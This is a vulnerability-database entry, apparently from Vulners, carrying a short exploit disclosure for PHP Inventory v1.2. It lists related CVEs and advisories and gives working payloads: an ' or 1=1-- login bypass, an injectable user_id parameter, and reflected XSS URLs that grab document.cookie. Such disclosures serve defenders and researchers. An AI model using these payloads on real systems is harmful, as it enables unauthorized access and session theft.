PHP Inventory v1.2 Authentication Bypass SQL Injectio
Reporter | Title | Published | Views | Family All 17 |
---|---|---|---|---|
OpenVAS | PHP Inventory < 1.3.2 SQLi Vulnerability | 5 Dec 201100:00 | – | openvas |
OpenVAS | PHP Inventory Multiple Vulnerabilities | 22 Jan 201000:00 | – | openvas |
Packet Storm | PHP Inventory 1.3.1 SQL Injection | 30 Nov 201100:00 | – | packetstorm |
securityvulns | PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability | 4 Dec 201100:00 | – | securityvulns |
securityvulns | Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 5 Dec 201100:00 | – | securityvulns |
Cvelist | CVE-2009-4595 | 12 Jan 201017:00 | – | cvelist |
Cvelist | CVE-2009-4596 | 12 Jan 201017:00 | – | cvelist |
Cvelist | CVE-2009-4597 | 12 Jan 201017:00 | – | cvelist |
Prion | Sql injection | 12 Jan 201017:30 | – | prion |
Prion | Sql injection | 12 Jan 201017:30 | – | prion |
#################################################################
#
# PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity
# Found By: mr_me
# Download: http://www.phpwares.com/content/php-inventory
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
First of all lets login to admin with:
http://[server]/php-inventory/index.php
username: ' or 1=1--
password: ' or 1=1--
The app is riddled with SQL Injection. For example:
http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI]
SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1
This of course means you can do some slightly dodgy refected XSS:
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script>
I leave the exploiting up to the reader.
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo